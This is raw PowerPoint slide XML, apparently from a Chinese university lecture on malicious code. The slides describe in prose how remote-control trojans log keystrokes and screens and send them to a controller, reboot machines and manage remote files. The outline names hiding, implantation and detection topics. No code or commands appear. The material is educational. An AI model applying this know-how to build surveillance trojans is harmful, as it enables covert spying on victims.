              <a:t>，通过函数返回值，进行分解和分析有关成分，进而得到相关信息。 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36080106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9" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>记录用户事件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103430" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="559466" y="1267644"/>
            <a:ext cx="7848600" cy="5007032"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>木马程序为了达到控制目标主机的目的，通常想知道目标主机用户目前在干什么，于是记录用户事件成了木马的又一主要功能。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>其一是记录被控端计算机的键盘和鼠标事件，形成一个文本文件，然后把该文件发送到控制端，控制端用户通过查看文件的方式了解被控端用户打开了哪些程序，敲了那些键；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>其二是在被控端抓取当前屏幕，形成一个位图文件，然后把该文件发送到控制端显示，从而通过抓取得屏幕知道目标用户的操作行为。 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41831547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3" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 远程操作</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104454" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591024" y="1475060"/>
            <a:ext cx="7993062" cy="4799616"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重启被控制端计算机，或者强制关闭远程计算机，当被控制计算机重新启动时，木马程序重新获得控制权。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马使用者通过网络控制被控端计算机的鼠标和键盘，也可以通过这种方式启动或停止被控端的应用程序。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对远程的文件进行管理，比如共享被控端的硬盘，之后就可以进行任意的文件操作。 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8961662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zh-CN" altLang="en-US"/>
              <a:t>内容提纲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64543" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1660525" y="722313"/>
            <a:ext cx="184150" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64554" name="Line 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1303338" y="3338513"/>
            <a:ext cx="6167437" cy="7937"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64555" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1030287" y="2762251"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9369E7"/>
          </a:soli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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64557" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1108075" y="2794000"/>
            <a:ext cx="354013" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64569" name="Rectangle 57"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1023937" y="3856038"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="669900"/>
          </a:soli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64570" name="Text Box 58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1839913" y="2686050"/>
            <a:ext cx="5497512" cy="579438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马的工作原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64571" name="Text Box 59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1101725" y="3887788"/>
            <a:ext cx="354013" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64587" name="Line 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1303338" y="4441825"/>
            <a:ext cx="6167437" cy="7938"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64583" name="Rectangle 71"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1028700" y="5100638"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9369E7"/>
          </a:soli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9369E7"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:flatTx/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64584" name="Text Box 72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1831976" y="3787775"/>
            <a:ext cx="5645150" cy="579438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马的隐藏技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64585" name="Text Box 73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1082675" y="5141913"/>
            <a:ext cx="354013" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64588" name="Line 76"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1303338" y="5686425"/>
            <a:ext cx="6167437" cy="7938"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64550" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1030287" y="1670051"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="669900"/>
          </a:soli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rgbClr val="669900"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:flatTx/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64551" name="Text Box 39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1836738" y="1633538"/>
            <a:ext cx="5726112" cy="579437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码概述</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64552" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1108075" y="1701800"/>
            <a:ext cx="354013" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64589" name="Line 77"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1303338" y="2262188"/>
            <a:ext cx="6167437" cy="7937"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64600" name="Text Box 88"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1827214" y="5018088"/>
            <a:ext cx="5611812" cy="579437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>恶意代码检测与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>防御</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3345155990"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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imes New Roman"/>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1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:effectLst/>
            <a:latin typeface="Tahoma" pitchFamily="34"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1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:effectLst/>
            <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            <a:ea typeface="宋体"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15510</TotalTime>
  <Words>13152</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>960</Paragraphs>
  <Slides>226</Slides>
  <Notes>96</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226</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="235" baseType="lpstr">
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>楷体_GB2312</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>1_Blends</vt:lpstr>
      <vt:lpstr>第 十七 章    恶意代码</vt:lpstr>
      <vt:lpstr>内容提纲</vt:lpstr>
      <vt:lpstr>一、定义</vt:lpstr>
      <vt:lpstr>恶意代码</vt:lpstr>
      <vt:lpstr>计算机病毒</vt:lpstr>
      <vt:lpstr>计算机病毒</vt:lpstr>
      <vt:lpstr>计算机病毒</vt:lpstr>
      <vt:lpstr>计算机病毒</vt:lpstr>
      <vt:lpstr>计算机病毒</vt:lpstr>
      <vt:lpstr>计算机蠕虫</vt:lpstr>
      <vt:lpstr>计算机蠕虫</vt:lpstr>
      <vt:lpstr>计算机木马</vt:lpstr>
      <vt:lpstr>计算机木马</vt:lpstr>
      <vt:lpstr>计算机木马</vt:lpstr>
      <vt:lpstr>计算机木马</vt:lpstr>
      <vt:lpstr>计算机木马</vt:lpstr>
      <vt:lpstr>计算机木马</vt:lpstr>
      <vt:lpstr>计算机木马</vt:lpstr>
      <vt:lpstr>计算机木马</vt:lpstr>
      <vt:lpstr>计算机木马木马</vt:lpstr>
      <vt:lpstr>其它：一句话木马</vt:lpstr>
      <vt:lpstr>计算机木马</vt:lpstr>
      <vt:lpstr>恶意代码</vt:lpstr>
      <vt:lpstr>二、恶意代码概念的演变</vt:lpstr>
      <vt:lpstr>恶意代码概念的发展史</vt:lpstr>
      <vt:lpstr>恶意代码概念的发展史</vt:lpstr>
      <vt:lpstr>恶意代码概念的发展史</vt:lpstr>
      <vt:lpstr>恶意代码概念的发展史</vt:lpstr>
      <vt:lpstr>恶意代码</vt:lpstr>
      <vt:lpstr>恶意代码</vt:lpstr>
      <vt:lpstr>恶意代码种类</vt:lpstr>
      <vt:lpstr>恶意代码种类</vt:lpstr>
      <vt:lpstr>恶意代码种类</vt:lpstr>
      <vt:lpstr>恶意代码种类</vt:lpstr>
      <vt:lpstr>内容提纲</vt:lpstr>
      <vt:lpstr>远程控制木马</vt:lpstr>
      <vt:lpstr>远程控制木马的运行步骤</vt:lpstr>
      <vt:lpstr>配置木马</vt:lpstr>
      <vt:lpstr>配置木马</vt:lpstr>
      <vt:lpstr>远程控制木马的运行步骤</vt:lpstr>
      <vt:lpstr>传播木马：木马植入</vt:lpstr>
      <vt:lpstr>1、主动植入 </vt:lpstr>
      <vt:lpstr>1、主动植入</vt:lpstr>
      <vt:lpstr>（1）本地安装</vt:lpstr>
      <vt:lpstr>（2）远程安装</vt:lpstr>
      <vt:lpstr>（3）利用系统自身漏洞植入</vt:lpstr>
      <vt:lpstr>（4）利用第三方软件漏洞植入</vt:lpstr>
      <vt:lpstr>2、被动植入 </vt:lpstr>
